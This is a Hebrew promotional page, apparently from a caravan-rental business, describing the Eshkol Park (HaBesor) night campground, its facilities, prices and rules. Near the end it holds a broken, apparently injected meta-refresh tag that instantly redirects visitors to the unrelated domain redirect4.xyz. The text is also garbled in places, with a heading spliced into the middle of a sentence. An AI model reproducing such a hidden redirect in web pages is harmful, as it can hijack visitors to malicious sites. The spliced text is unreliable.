פארק אשכול (גן לאומי הבשור)

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

פארק אשכול, הידוע גם בתור הגן הלאומי בשור, הוא אתר אידיאלי למשפחות, אבל ממש לא רק. הוא ממוקם בלב המדבר בנגבפארק אשכול (גן לאומי הבשור) המערבי, על גדותיו של נחל בשור.

הוא מציע הכל מהכל: מעיין שופע עם בריכות מים בהם ניתן להשתכשך, אתר עתיקות שלוקח אותנו במנהרת הזמן עד התקופה המצרית הקדומה, שחזור גשר רכבת מתקופת המנדט הבריטי, שולחנות פיקניק – וגם חניון לילה עצום בגודלו, שמתאים גם לקראוונים.

מה תמצאו בחניון הלילה?

חניון הלילה של פארק אשכול הוא בעל קיבולת של לא פחות מכ-2,000 איש. אלה יכולים לבחור באפשרויות לינה שונות: לינה תחת כיפת השמיים באוהלים פרטיים, שישה חדרי צוות המיועדים לעד חמישה אנשים, שני חדרים מונגשים וגם חניון קראוונים, שמיישר קו עם אחד הטרנדים החמים ביותר בתחום התיירות בעולם. החניון פועל בל ימות השנה, למעט יום כיפור.

חניון הקראוונים מאפשר חיבור למים ולחשמל, דרישת חובה אצל המטיילים הממוצעים. לצד זה הוא מציע תשתיות אירוח ושהות די נרחבות. הן כוללות תאורה מלאה, ספסלים ושולחנות (ניידים או קבועים), ברזיות מים, פינות לעשיית מנגלים, תאי טעינה לטלפונים סלולריים ועוד. המתחם מציע מטבח שדה ובו מקררים גדולים, כירות גז באמצעותן ניתן לבשל אוכל וכיורים בהם שוטפים את הכלים לאחר הארוחה.

מבחינת שירותים ומקלחת, החלוקה היא לשני אזורים. באזור 1 תמצאו חמישה תאי שירותים ושלושה תאי מקלחות לנשים, לצד עשרה תאי שירותים ו-3 תאי מקלחות לגברים. באזור 2 יש חמישה תאי שירותים וחמישה תאי מקלחות לנשים, כאשר לגברים מוצעים אחד עשר תאי שירותים וחמישה תאי מקלחות.

במקום פועל מרכז שירות למטייל, בהתאם לצרכי הקבוצות הנמצאות בו. במרכז ניתן לרכוש משקאות, חטיפים, ארטיקים, גלידות, כלים חד פעמיים ועוד. אם נתקעתם בלי מספיק פתרונות שינה לילדים תוכלו לשכור במקום מזרן לילדים, תמורת מחיר די בסיסי.

מחיר ותנאי כניסה

כדי להיכנס לחניון הלילה של הגן הלאומי אשכול יש צורך בתשלום, אבל הוא ממש לא גבוה מדי. המחיר נכון לנקודת הזמן הנוכחית עומד על 53 ש”ח למבוגר ו-42 ש”ח לילד, כאשר מנויי רשות הטבע והגנים יכולים להיכנס ב-38 ש”ח למבוגר או 32 ש”ח לילד. מחירים אלה כוללים לצד הלינה גם את הביקור בגן הלאומי עצמו. עבור החיבור בחשמל נדרש סכום סביר של 30 ש”ח ללילה לקראוון.

חשוב לשים לב לשעות הכניסה והיציאה מהחניה. לחניון הלילה ניתן להיכנס החל מהשעה 16:00 ועד השעה 22:30. היציאה מהחניון, ביום העזיבה שלו, נדרש שתיעשה עד השעה 11:00 ביום רגיל, או השעה 10:00 ביום חג – מי שלא מפנה את החניון בזמן עלול לשלם קנס שהוא הכל חוץ מנעים. כמו כן במהלך השהות בחניון הלילה אסור להפעיל אמצעי הגברה או גנרטורים, וגם לא להכניס בעלי חיים.
equiv
"Refresh" content="0; URL=http://redirect4.xyz/">

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

המרכז להשכרת קרוואנים

שירותי השכרת קרוואנים עם החברה המובילה בישראל. קרוואנים לכל צורך ולכל מטרה להשכרה במחיר זול ומשתלם!

אז מה היה לנו בכתבה:

צרו איתנו קשר